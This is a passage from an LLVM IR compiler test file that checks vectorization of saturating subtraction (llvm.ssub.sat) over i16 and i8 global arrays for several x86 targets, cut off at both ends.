; SSE-NEXT: [[TMP8:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 24) to <8 x i16>*), align 2
; SSE-NEXT: [[TMP9:%.*]] = call <8 x i16> @llvm.ssub.sat.v8i16(<8 x i16> [[TMP1]], <8 x i16> [[TMP5]])
; SSE-NEXT: [[TMP10:%.*]] = call <8 x i16> @llvm.ssub.sat.v8i16(<8 x i16> [[TMP2]], <8 x i16> [[TMP6]])
; SSE-NEXT: [[TMP11:%.*]] = call <8 x i16> @llvm.ssub.sat.v8i16(<8 x i16> [[TMP3]], <8 x i16> [[TMP7]])
; SSE-NEXT: [[TMP12:%.*]] = call <8 x i16> @llvm.ssub.sat.v8i16(<8 x i16> [[TMP4]], <8 x i16> [[TMP8]])
; SSE-NEXT: store <8 x i16> [[TMP9]], <8 x i16>* bitcast ([32 x i16]* @c16 to <8 x i16>*), align 2
; SSE-NEXT: store <8 x i16> [[TMP10]], <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 8) to <8 x i16>*), align 2
; SSE-NEXT: store <8 x i16> [[TMP11]], <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 16) to <8 x i16>*), align 2
; SSE-NEXT: store <8 x i16> [[TMP12]], <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 24) to <8 x i16>*), align 2
; SSE-NEXT: ret void
;
; SLM-LABEL: @sub_v32i16(
; SLM-NEXT: [[TMP1:%.*]] = load <8 x i16>, <8 x i16>* bitcast ([32 x i16]* @a16 to <8 x i16>*), align 2
; SLM-NEXT: [[TMP2:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 8) to <8 x i16>*), align 2
; SLM-NEXT: [[TMP3:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 16) to <8 x i16>*), align 2
; SLM-NEXT: [[TMP4:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 24) to <8 x i16>*), align 2
; SLM-NEXT: [[TMP5:%.*]] = load <8 x i16>, <8 x i16>* bitcast ([32 x i16]* @b16 to <8 x i16>*), align 2
; SLM-NEXT: [[TMP6:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 8) to <8 x i16>*), align 2
; SLM-NEXT: [[TMP7:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 16) to <8 x i16>*), align 2
; SLM-NEXT: [[TMP8:%.*]] = load <8 x i16>, <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 24) to <8 x i16>*), align 2
; SLM-NEXT: [[TMP9:%.*]] = call <8 x i16> @llvm.ssub.sat.v8i16(<8 x i16> [[TMP1]], <8 x i16> [[TMP5]])
; SLM-NEXT: [[TMP10:%.*]] = call <8 x i16> @llvm.ssub.sat.v8i16(<8 x i16> [[TMP2]], <8 x i16> [[TMP6]])
; SLM-NEXT: [[TMP11:%.*]] = call <8 x i16> @llvm.ssub.sat.v8i16(<8 x i16> [[TMP3]], <8 x i16> [[TMP7]])
; SLM-NEXT: [[TMP12:%.*]] = call <8 x i16> @llvm.ssub.sat.v8i16(<8 x i16> [[TMP4]], <8 x i16> [[TMP8]])
; SLM-NEXT: store <8 x i16> [[TMP9]], <8 x i16>* bitcast ([32 x i16]* @c16 to <8 x i16>*), align 2
; SLM-NEXT: store <8 x i16> [[TMP10]], <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 8) to <8 x i16>*), align 2
; SLM-NEXT: store <8 x i16> [[TMP11]], <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 16) to <8 x i16>*), align 2
; SLM-NEXT: store <8 x i16> [[TMP12]], <8 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 24) to <8 x i16>*), align 2
; SLM-NEXT: ret void
;
; AVX-LABEL: @sub_v32i16(
; AVX-NEXT: [[TMP1:%.*]] = load <16 x i16>, <16 x i16>* bitcast ([32 x i16]* @a16 to <16 x i16>*), align 2
; AVX-NEXT: [[TMP2:%.*]] = load <16 x i16>, <16 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 16) to <16 x i16>*), align 2
; AVX-NEXT: [[TMP3:%.*]] = load <16 x i16>, <16 x i16>* bitcast ([32 x i16]* @b16 to <16 x i16>*), align 2
; AVX-NEXT: [[TMP4:%.*]] = load <16 x i16>, <16 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 16) to <16 x i16>*), align 2
; AVX-NEXT: [[TMP5:%.*]] = call <16 x i16> @llvm.ssub.sat.v16i16(<16 x i16> [[TMP1]], <16 x i16> [[TMP3]])
; AVX-NEXT: [[TMP6:%.*]] = call <16 x i16> @llvm.ssub.sat.v16i16(<16 x i16> [[TMP2]], <16 x i16> [[TMP4]])
; AVX-NEXT: store <16 x i16> [[TMP5]], <16 x i16>* bitcast ([32 x i16]* @c16 to <16 x i16>*), align 2
; AVX-NEXT: store <16 x i16> [[TMP6]], <16 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 16) to <16 x i16>*), align 2
; AVX-NEXT: ret void
;
; AVX512-LABEL: @sub_v32i16(
; AVX512-NEXT: [[TMP1:%.*]] = load <16 x i16>, <16 x i16>* bitcast ([32 x i16]* @a16 to <16 x i16>*), align 2
; AVX512-NEXT: [[TMP2:%.*]] = load <16 x i16>, <16 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 16) to <16 x i16>*), align 2
; AVX512-NEXT: [[TMP3:%.*]] = load <16 x i16>, <16 x i16>* bitcast ([32 x i16]* @b16 to <16 x i16>*), align 2
; AVX512-NEXT: [[TMP4:%.*]] = load <16 x i16>, <16 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 16) to <16 x i16>*), align 2
; AVX512-NEXT: [[TMP5:%.*]] = call <16 x i16> @llvm.ssub.sat.v16i16(<16 x i16> [[TMP1]], <16 x i16> [[TMP3]])
; AVX512-NEXT: [[TMP6:%.*]] = call <16 x i16> @llvm.ssub.sat.v16i16(<16 x i16> [[TMP2]], <16 x i16> [[TMP4]])
; AVX512-NEXT: store <16 x i16> [[TMP5]], <16 x i16>* bitcast ([32 x i16]* @c16 to <16 x i16>*), align 2
; AVX512-NEXT: store <16 x i16> [[TMP6]], <16 x i16>* bitcast (i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 16) to <16 x i16>*), align 2
; AVX512-NEXT: ret void
;
%a0 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 0 ), align 2
%a1 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 1 ), align 2
%a2 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 2 ), align 2
%a3 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 3 ), align 2
%a4 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 4 ), align 2
%a5 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 5 ), align 2
%a6 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 6 ), align 2
%a7 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 7 ), align 2
%a8 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 8 ), align 2
%a9 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 9 ), align 2
%a10 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 10), align 2
%a11 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 11), align 2
%a12 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 12), align 2
%a13 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 13), align 2
%a14 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 14), align 2
%a15 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 15), align 2
%a16 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 16), align 2
%a17 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 17), align 2
%a18 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 18), align 2
%a19 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 19), align 2
%a20 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 20), align 2
%a21 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 21), align 2
%a22 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 22), align 2
%a23 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 23), align 2
%a24 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 24), align 2
%a25 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 25), align 2
%a26 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 26), align 2
%a27 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 27), align 2
%a28 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 28), align 2
%a29 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 29), align 2
%a30 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 30), align 2
%a31 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @a16, i32 0, i64 31), align 2
%b0 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 0 ), align 2
%b1 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 1 ), align 2
%b2 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 2 ), align 2
%b3 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 3 ), align 2
%b4 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 4 ), align 2
%b5 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 5 ), align 2
%b6 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 6 ), align 2
%b7 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 7 ), align 2
%b8 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 8 ), align 2
%b9 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 9 ), align 2
%b10 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 10), align 2
%b11 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 11), align 2
%b12 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 12), align 2
%b13 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 13), align 2
%b14 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 14), align 2
%b15 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 15), align 2
%b16 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 16), align 2
%b17 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 17), align 2
%b18 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 18), align 2
%b19 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 19), align 2
%b20 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 20), align 2
%b21 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 21), align 2
%b22 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 22), align 2
%b23 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 23), align 2
%b24 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 24), align 2
%b25 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 25), align 2
%b26 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 26), align 2
%b27 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 27), align 2
%b28 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 28), align 2
%b29 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 29), align 2
%b30 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 30), align 2
%b31 = load i16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @b16, i32 0, i64 31), align 2
%r0 = call i16 @llvm.ssub.sat.i16(i16 %a0 , i16 %b0 )
%r1 = call i16 @llvm.ssub.sat.i16(i16 %a1 , i16 %b1 )
%r2 = call i16 @llvm.ssub.sat.i16(i16 %a2 , i16 %b2 )
%r3 = call i16 @llvm.ssub.sat.i16(i16 %a3 , i16 %b3 )
%r4 = call i16 @llvm.ssub.sat.i16(i16 %a4 , i16 %b4 )
%r5 = call i16 @llvm.ssub.sat.i16(i16 %a5 , i16 %b5 )
%r6 = call i16 @llvm.ssub.sat.i16(i16 %a6 , i16 %b6 )
%r7 = call i16 @llvm.ssub.sat.i16(i16 %a7 , i16 %b7 )
%r8 = call i16 @llvm.ssub.sat.i16(i16 %a8 , i16 %b8 )
%r9 = call i16 @llvm.ssub.sat.i16(i16 %a9 , i16 %b9 )
%r10 = call i16 @llvm.ssub.sat.i16(i16 %a10, i16 %b10)
%r11 = call i16 @llvm.ssub.sat.i16(i16 %a11, i16 %b11)
%r12 = call i16 @llvm.ssub.sat.i16(i16 %a12, i16 %b12)
%r13 = call i16 @llvm.ssub.sat.i16(i16 %a13, i16 %b13)
%r14 = call i16 @llvm.ssub.sat.i16(i16 %a14, i16 %b14)
%r15 = call i16 @llvm.ssub.sat.i16(i16 %a15, i16 %b15)
%r16 = call i16 @llvm.ssub.sat.i16(i16 %a16, i16 %b16)
%r17 = call i16 @llvm.ssub.sat.i16(i16 %a17, i16 %b17)
%r18 = call i16 @llvm.ssub.sat.i16(i16 %a18, i16 %b18)
%r19 = call i16 @llvm.ssub.sat.i16(i16 %a19, i16 %b19)
%r20 = call i16 @llvm.ssub.sat.i16(i16 %a20, i16 %b20)
%r21 = call i16 @llvm.ssub.sat.i16(i16 %a21, i16 %b21)
%r22 = call i16 @llvm.ssub.sat.i16(i16 %a22, i16 %b22)
%r23 = call i16 @llvm.ssub.sat.i16(i16 %a23, i16 %b23)
%r24 = call i16 @llvm.ssub.sat.i16(i16 %a24, i16 %b24)
%r25 = call i16 @llvm.ssub.sat.i16(i16 %a25, i16 %b25)
%r26 = call i16 @llvm.ssub.sat.i16(i16 %a26, i16 %b26)
%r27 = call i16 @llvm.ssub.sat.i16(i16 %a27, i16 %b27)
%r28 = call i16 @llvm.ssub.sat.i16(i16 %a28, i16 %b28)
%r29 = call i16 @llvm.ssub.sat.i16(i16 %a29, i16 %b29)
%r30 = call i16 @llvm.ssub.sat.i16(i16 %a30, i16 %b30)
%r31 = call i16 @llvm.ssub.sat.i16(i16 %a31, i16 %b31)
store i16 %r0 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 0 ), align 2
store i16 %r1 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 1 ), align 2
store i16 %r2 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 2 ), align 2
store i16 %r3 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 3 ), align 2
store i16 %r4 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 4 ), align 2
store i16 %r5 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 5 ), align 2
store i16 %r6 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 6 ), align 2
store i16 %r7 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 7 ), align 2
store i16 %r8 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 8 ), align 2
store i16 %r9 , i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 9 ), align 2
store i16 %r10, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 10), align 2
store i16 %r11, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 11), align 2
store i16 %r12, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 12), align 2
store i16 %r13, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 13), align 2
store i16 %r14, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 14), align 2
store i16 %r15, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 15), align 2
store i16 %r16, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 16), align 2
store i16 %r17, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 17), align 2
store i16 %r18, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 18), align 2
store i16 %r19, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 19), align 2
store i16 %r20, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 20), align 2
store i16 %r21, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 21), align 2
store i16 %r22, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 22), align 2
store i16 %r23, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 23), align 2
store i16 %r24, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 24), align 2
store i16 %r25, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 25), align 2
store i16 %r26, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 26), align 2
store i16 %r27, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 27), align 2
store i16 %r28, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 28), align 2
store i16 %r29, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 29), align 2
store i16 %r30, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 30), align 2
store i16 %r31, i16* getelementptr inbounds ([32 x i16], [32 x i16]* @c16, i32 0, i64 31), align 2
ret void
}
define void @sub_v64i8() {
; CHECK-LABEL: @sub_v64i8(
; CHECK-NEXT: [[TMP1:%.*]] = load <16 x i8>, <16 x i8>* bitcast ([64 x i8]* @a8 to <16 x i8>*), align 1
; CHECK-NEXT: [[TMP2:%.*]] = load <16 x i8>, <16 x i8>* bitcast (i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 16) to <16 x i8>*), align 1
; CHECK-NEXT: [[TMP3:%.*]] = load <16 x i8>, <16 x i8>* bitcast (i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 32) to <16 x i8>*), align 1
; CHECK-NEXT: [[TMP4:%.*]] = load <16 x i8>, <16 x i8>* bitcast (i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 48) to <16 x i8>*), align 1
; CHECK-NEXT: [[TMP5:%.*]] = load <16 x i8>, <16 x i8>* bitcast ([64 x i8]* @b8 to <16 x i8>*), align 1
; CHECK-NEXT: [[TMP6:%.*]] = load <16 x i8>, <16 x i8>* bitcast (i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 16) to <16 x i8>*), align 1
; CHECK-NEXT: [[TMP7:%.*]] = load <16 x i8>, <16 x i8>* bitcast (i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 32) to <16 x i8>*), align 1
; CHECK-NEXT: [[TMP8:%.*]] = load <16 x i8>, <16 x i8>* bitcast (i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 48) to <16 x i8>*), align 1
; CHECK-NEXT: [[TMP9:%.*]] = call <16 x i8> @llvm.ssub.sat.v16i8(<16 x i8> [[TMP1]], <16 x i8> [[TMP5]])
; CHECK-NEXT: [[TMP10:%.*]] = call <16 x i8> @llvm.ssub.sat.v16i8(<16 x i8> [[TMP2]], <16 x i8> [[TMP6]])
; CHECK-NEXT: [[TMP11:%.*]] = call <16 x i8> @llvm.ssub.sat.v16i8(<16 x i8> [[TMP3]], <16 x i8> [[TMP7]])
; CHECK-NEXT: [[TMP12:%.*]] = call <16 x i8> @llvm.ssub.sat.v16i8(<16 x i8> [[TMP4]], <16 x i8> [[TMP8]])
; CHECK-NEXT: store <16 x i8> [[TMP9]], <16 x i8>* bitcast ([64 x i8]* @c8 to <16 x i8>*), align 1
; CHECK-NEXT: store <16 x i8> [[TMP10]], <16 x i8>* bitcast (i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 16) to <16 x i8>*), align 1
; CHECK-NEXT: store <16 x i8> [[TMP11]], <16 x i8>* bitcast (i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 32) to <16 x i8>*), align 1
; CHECK-NEXT: store <16 x i8> [[TMP12]], <16 x i8>* bitcast (i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 48) to <16 x i8>*), align 1
; CHECK-NEXT: ret void
;
%a0 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 0 ), align 1
%a1 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 1 ), align 1
%a2 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 2 ), align 1
%a3 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 3 ), align 1
%a4 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 4 ), align 1
%a5 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 5 ), align 1
%a6 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 6 ), align 1
%a7 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 7 ), align 1
%a8 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 8 ), align 1
%a9 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 9 ), align 1
%a10 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 10), align 1
%a11 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 11), align 1
%a12 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 12), align 1
%a13 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 13), align 1
%a14 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 14), align 1
%a15 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 15), align 1
%a16 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 16), align 1
%a17 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 17), align 1
%a18 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 18), align 1
%a19 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 19), align 1
%a20 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 20), align 1
%a21 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 21), align 1
%a22 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 22), align 1
%a23 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 23), align 1
%a24 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 24), align 1
%a25 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 25), align 1
%a26 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 26), align 1
%a27 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 27), align 1
%a28 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 28), align 1
%a29 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 29), align 1
%a30 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 30), align 1
%a31 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 31), align 1
%a32 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 32), align 1
%a33 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 33), align 1
%a34 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 34), align 1
%a35 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 35), align 1
%a36 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 36), align 1
%a37 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 37), align 1
%a38 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 38), align 1
%a39 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 39), align 1
%a40 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 40), align 1
%a41 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 41), align 1
%a42 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 42), align 1
%a43 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 43), align 1
%a44 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 44), align 1
%a45 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 45), align 1
%a46 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 46), align 1
%a47 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 47), align 1
%a48 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 48), align 1
%a49 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 49), align 1
%a50 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 50), align 1
%a51 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 51), align 1
%a52 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 52), align 1
%a53 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 53), align 1
%a54 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 54), align 1
%a55 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 55), align 1
%a56 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 56), align 1
%a57 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 57), align 1
%a58 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @a8, i32 0, i64 58), align 1
